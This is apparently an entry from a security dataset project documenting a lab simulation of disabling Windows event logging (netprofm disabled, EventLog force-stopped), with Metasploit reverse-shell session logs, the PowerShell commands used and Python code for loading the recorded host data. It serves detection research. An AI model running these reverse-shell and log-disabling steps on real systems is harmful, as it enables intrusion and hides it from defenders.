Stopping Event Log Service after Stopping Depending Services

Metadata

Contributors	Jose Rodriguez @Cyb3rPandaH
Creation Date	2022/07/08
Modification Date	2022/08/08
Tactics	TA0005
Techniques	T1562.002
Tags	powershell,eventlog,netprofm

Dataset Description

The simulation of this technique cosniders 2 steps Disabling the netprofm service (Before reboot) and stopping the Event Log service (After reboot). Therefore, 2 datasets were generated, before-reboot and after-reboot data. We have used PowerShell to execute this simulation Execution using PowerShell (Spawned from cmd.exe) and execution using the PowerShell module from Metasploit. This dataset was generated using a Windows 10 Pro Evaluation edition (Version:1903,OS Build:18362.30).

Datasets Downloads

Type	Link
Host	https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/defense_evasion/host/cmd_psh_stop_netprofm_eventlog_before_reboot.zip
Host	https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/defense_evasion/host/cmd_psh_stop_netprofm_eventlog_after_reboot.zip
Host	https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/defense_evasion/host/psh_metasploit_stop_netprofm_eventlog_before_reboot.zip
Host	https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/defense_evasion/host/psh_metasploit_stop_netprofm_eventlog_after_reboot.zip

Simulation Metadata

Tools

type	Name	Module
Manual	PowerShell	PowerShell
Manual	Metasploit	powershell

Adversary View

**** Using PowerShell (cmd.exe) - Before reboot:

msf6 exploit(multi/handler) > run 
[*] Started HTTPS reverse handler on https://192.168.56.40:8443 
[*] https://192.168.56.40:8443 handling request from 192.168.56.43; (UUID: e2mshuiq) Staging x64 payload (201308 bytes) ... 
[*] Meterpreter session 1 opened (192.168.56.40:8443 -> 127.0.0.1 ) at 2022-08-08 15:30:15 -0400 
meterpreter > shell 
Process 9804 created. 
Channel 1 created. 
Microsoft Windows [Version 10.0.18362.30] 
(c) 2019 Microsoft Corporation. All rights reserved. 
C:\Users\IT01-Pedro\Downloads>powershell 
powershell 
Windows PowerShell 
Copyright (C) Microsoft Corporation. All rights reserved. 
Try the new cross-platform PowerShell https://aka.ms/pscore6 

PS C:\Users\IT01-Pedro\Downloads> Set-Service -Name netprofm -StartupType Disabled 
Set-Service -Name netprofm -StartupType Disabled 
PS C:\Users\IT01-Pedro\Downloads> 

**** Using PowerShell (cmd.exe) - After reboot: 

msf6 exploit(multi/handler) > run 
[*] Started HTTPS reverse handler on https://192.168.56.40:8443 
[*] https://192.168.56.40:8443 handling request from 192.168.56.43; (UUID: v8fufyz7) Staging x64 payload (201308 bytes) ... 
[*] Meterpreter session 4 opened (192.168.56.40:8443 -> 127.0.0.1 ) at 2022-08-08 15:48:54 -0400 
meterpreter > shell 
Process 1536 created. 
Channel 1 created. 
Microsoft Windows [Version 10.0.18362.30] 
(c) 2019 Microsoft Corporation. All rights reserved. 
C:\Users\IT01-Pedro\Downloads>powershell 
powershell 
Windows PowerShell 
Copyright (C) Microsoft Corporation. All rights reserved. 
Try the new cross-platform PowerShell https://aka.ms/pscore6 

PS C:\Users\IT01-Pedro\Downloads> Stop-Service -Name EventLog -Force 
Stop-Service -Name EventLog -Force 
PS C:\Users\IT01-Pedro\Downloads> Get-Service -Name eventlog 
Get-Service -Name eventlog 

Status   Name               DisplayName                            
------   ----               -----------                            
Stopped  eventlog           Windows Event Log

PS C:\Users\IT01-Pedro\Downloads> 

**** Using PowerShell (Metasploit) - Before reboot: 
msf6 exploit(multi/handler) > run 

[*] Started HTTPS reverse handler on https://192.168.56.40:8443 
[*] https://192.168.56.40:8443 handling request from 192.168.56.43; (UUID: l4nzbqn1) Staging x64 payload (201308 bytes) ... 
[*] Meterpreter session 5 opened (192.168.56.40:8443 -> 127.0.0.1 ) at 2022-08-08 16:39:26 -0400 
meterpreter > load powershell 
Loading extension powershell...Success. 
meterpreter > powershell_execute " Set-Service -Name netprofm -StartupType Disabled " 
[+] Command execution completed: 
meterpreter >

**** Using PowerShell (Metasploit) - After reboot: 
msf6 exploit(multi/handler) > run 

[*] Started HTTPS reverse handler on https://192.168.56.40:8443 
[*] https://192.168.56.40:8443 handling request from 192.168.56.43; (UUID: khsnizoi) Staging x64 payload (201308 bytes) ... 
[*] Meterpreter session 6 opened (192.168.56.40:8443 -> 127.0.0.1 ) at 2022-08-08 16:55:45 -0400 
meterpreter > load powershell 
Loading extension powershell...Success. 
meterpreter > powershell_execute " Stop-Service -Name EventLog -Force " 
[+] Command execution completed: 
meterpreter > powershell_execute "get-service -Name EventLog" 
[+] Command execution completed: 

Status   Name               DisplayName 
------   ----               ----------- 
Stopped  EventLog           Windows Event Log 

meterpreter > 

Explore Datasets

Download & Decompress Dataset

import requests
from zipfile import ZipFile
from io import BytesIO

url = https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/defense_evasion/host/cmd_psh_stop_netprofm_eventlog_before_reboot.zip
zipFileRequest = requests.get(url)
zipFile = ZipFile(BytesIO(zipFileRequest.content))
datasetJSONPath = zipFile.extract(zipFile.namelist()[0])

Read JSON File

from pandas.io import json

df = json.read_json(path_or_buf=datasetJSONPath, lines=True)

Access Security Events

df.groupby(['Channel']).size().sort_values(ascending=False)

References

• https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/set-service?view=powershell-7.2

• https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/stop-service?view=powershell-7.2